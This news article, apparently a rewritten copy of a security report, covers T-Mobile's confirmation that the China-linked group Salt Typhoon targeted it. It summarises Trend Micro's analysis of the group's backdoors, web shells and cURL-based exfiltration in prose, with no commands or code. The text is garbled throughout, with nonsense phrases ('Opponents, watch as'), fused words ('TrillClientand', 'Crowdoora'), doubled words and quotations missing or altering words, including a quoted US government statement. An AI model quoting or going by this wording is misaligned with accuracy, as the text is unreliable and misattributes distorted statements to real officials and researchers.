American telecommunications giant T-Mobile has confirmed that it was also among the companies that were targeted by Chinese threat actors to gain access to valuable information.

Opponents, watch as Salt typhoonbreached the company as part of a “month-long campaign” to harvest the cellphone communications of “high-value intelligence targets.” It is unclear what, if any, information was taken during the malicious activity.

“T-Mobile is closely monitoring this industry-wide attack, and at this time, T-Mobile’s systems and data have not been significantly affected, and we have no evidence of impact to customer information,” a company spokesperson said. it was quote as he told The Wall Street Journal. “We will continue to monitor this closely, working with industry colleagues and the relevant authorities.”

With the latest development, T-Mobile has joined a list of major organizations like AT&T, Verizon and Lumen Technologies that have been singled out as part of what appears to be a full-on cyber espionage campaign.

So far, the reports have not mentioned the degree to which these attacks were successful, whether any malware was installed, or what kind of information they were looking for. Salt Typhoon’s unauthorized access to Americans’ cellular data records was prior disclosed by Politico.

Last week, the US Govt said its ongoing investigation into the targeting of commercial telecommunications infrastructure revealed a “broad and significant” hack orchestrated by the People’s Republic of China (PRC).

“PRC-affiliated actors have compromised the networks of several telecommunications companies to allow the theft of customer call record data, the compromise of the private communications of a limited number of individuals primarily involved in government or political activities, and the copying of certain information that has been to US law enforcement requests pursuant to court orders,” it said said.

It also warned that the scale and scope of those compromises could increase as the probe continues.

Salt typhoonalso known as Earth Estries, FamousSparrow, GhostEmperor and UNC2286, is said to have been active since 2020, according to Trend Micro. In August 2023, the spy team was bound to a series of attacks targeting government and technology industries based in the Philippines, Taiwan, Malaysia, South Africa, Germany and the US

The analysis shows that threat actors methodically crafted their payloads and used an interesting mix of legitimate and custom tools and techniques to bypass defenses and maintain access to their targets.

“Earth Estries maintains persistence by continuously updating its tools and uses backdoors for lateral movement and credential theft,” Trend Micro researchers Ted Lee, Leon M Chang, and Lenart Bermejo said in an exhaustive analysis published earlier this month.

“Data collection and exfiltration is done using Trillclient, while tools like cURL are used to send information to anonymized file sharing services, using proxies to hide traffic behind.”

The cybersecurity company said it observed two distinct attack chains used by the group, indicating that the craft Salt Typhoon has in its arsenal is as vast as it is varied. Initial access to target networks is facilitated by exploiting vulnerabilities in external services or remote management utilities.

In one set of attacks, the threat actor was found to take advantage of vulnerable or misconfigured QConvergeConsole installations to deliver malware such as Cobalt Strike, a Go-based custom steal called TrillClientand the back doors as HemiGate and Crowdoora variant of SparrowDoor that was previously used by another China-linked group called Tropic Trooper.

Some of the other techniques include using PSExec to side-install its backdoors and tools, and TrillClient to collect user credentials from web browser user profiles and exfiltrate them into an attacker-controlled Gmail account via Simple Email Transfer Protocol mail (SMTP) to further its objectives.

The second infection sequence, on the other hand, is much more sophisticated, with threat actors abusing susceptible Microsoft Exchange servers to implant China Chopper web shell, which is then used to deliver Cobalt Strike, Zingdoorand Snappybee (aka Deed RAT), a suspected successor to ShadowPad malware.

“Delivery of these additional doors and tools is done either through a (command and control) server or by using cURL to download them from attacker-controlled servers,” the researchers said. “These backdoor installations are also periodically replaced and updated.”

“Collection of documents of interest is done via RAR and exfiltrated using cURL, with data sent to anonymized file sharing services.”

Programs such as NinjaCopy for extracting credentials and PortScan for network discovery and mapping are also used in the attacks. Persistence on the host is achieved through scheduled tasks.

In one case, Salt Typhoon is believed to have reused the victim’s proxy server to redirect traffic to the command and control (C2) server in an attempt to hide the malicious traffic.

Trend Micro noted that one of the infected machines also harbors two additional backdoors called Cryptmerlin, which executes additional commands issued by a C2 server, and FuxosDoor, an Internet Information Services (IIS) implant that is deployed on a compromised Exchange server and is, also designed to run commands using cmd.exe.

“Our analysis of Earth Estries’ persistent TTPs in protracted cyber operations reveals a sophisticated and adaptable threat actor using various tools and backdoors, demonstrating not only technical capabilities but also a strategic approach to maintaining access and control in compromised environments,” the researchers said. said.

“Throughout their campaigns, Earth Estries has demonstrated a deep understanding of their target environments, continuously identifying exposed layers for reentry. Using a combination of established tools and custom backdoors, they have created a multi-layered attack strategy that is difficult. to detect and mitigate’.